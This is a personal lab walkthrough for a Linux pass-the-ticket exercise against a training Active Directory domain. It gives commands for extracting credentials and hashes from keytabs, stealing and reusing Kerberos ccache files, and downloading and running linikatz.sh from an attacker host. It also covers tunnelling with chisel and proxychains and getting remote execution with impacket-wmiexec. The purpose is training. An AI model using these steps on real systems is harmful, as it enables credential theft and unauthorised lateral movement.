Pass the Ticket (PtT) from Linux

June 11, 2024

ssh david@inlanefreight.htb@10.129.234.123 -p 2222

realm list

find / -name *keytab* -ls 2>/dev/null

python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab

ntlm- a738f92b3c08b424ec2d99589a9cce60
user - carlos
pass - Password5

ssh carlos@inlanefreight.htb@10.129.234.123 -p 2222

crontab -l

cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh

python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt

cd ~/.scripts
ls -la
python3 /opt/keytabextract.py svc_workstations._all.kt

user - svc_workstations
pass - Password4
NTLM - 7247e8d4387e76996ff3f18a34316fdd

su svc_workstations@inlanefreight.htb

sudo -l

Use this to get to root

sudo su

As we can see the julio user is domain user and can attempt to get access to the domain shared folder via julio

id julio@inlanefreight.htb

ls -la

Now we can impersonate the user via export command

As you can see we have julio as default principal

klist
export KRB5CCNAME=krb5cc_647401106_VRIdHN
klist

You have to be fast to authenticate to smbclient since the ticket is just temporary

smbclient //dc01/julio -k -c ls -no-pass

smbclient //dc01/julio -k -c 'get julio.txt' -no-pass
ls
cat julio.txt

You gotta find the file containing the credentials of Linux machines in Active Directory.

find / -name *keytab* -ls 2>/dev/null

python3 /opt/keytabextract.py /etc/krb5.keytab

user - LINUX01$
ntlm - 5aa7d65408b1c36bb2d0892b8e53bce8

Or we could just use the keytab since we have permission so that we can impersonate the user linux01

kinit LINUX01$ -k -t /etc/krb5.keytab
klist

smbclient //dc01/linux01 -k -c ls
smbclient //dc01/linux01 -k -c 'get flag.txt'
cat flag.txt

Now for the next not required task

First we have to ssh to the machine

ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
sudo su

Get the linikatz.sh

This tool will find for kerberos tickets in the system

wget http://10.10.15.13:8000/linikatz.sh
chmod +x linikatz.sh
./linikatz.sh

I made a visual graph about the network

Then for the next one we can try the chisel which is port forwarding tool

First we have to set the IPs in our attacker machine

sudo subl /etc/hosts

172.16.1.10 inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01
172.16.1.5  ms01.inlanefreight.htb  ms01

sudo subl /usr/local/etc/proxychains.conf

socks5 127.0.0.1 1080

sudo ./chisel server --reverse

xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution

cd tools
chisel.exe client 10.10.15.13:8080 R:socks

But first we have to get the Julio's ccache file from the linux machine

ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
ls -la

Then we will change the permission so that we can copy it using scp

chmod 644 krb5cc_647401106_ZN5b8D

scp -P 2222 svc_workstations@inlanefreight.htb@10.129.215.254:/tmp/krb5cc_647401106_ZN5b8D .

Then we are going to export the ccache file so that we can connect to the dc01 as julio

export KRB5CCNAME=/home/kyou/academy-htb/password-attacks/pass-the-ticket/krb5cc_647401106_ZN5b8D

Then just use proxychains4 from the home directory to connect to dc01

./proxychains4 impacket-wmiexec dc01 -k

./proxychains4 impacket-wmiexec ms01 -k

Last updated 1 year ago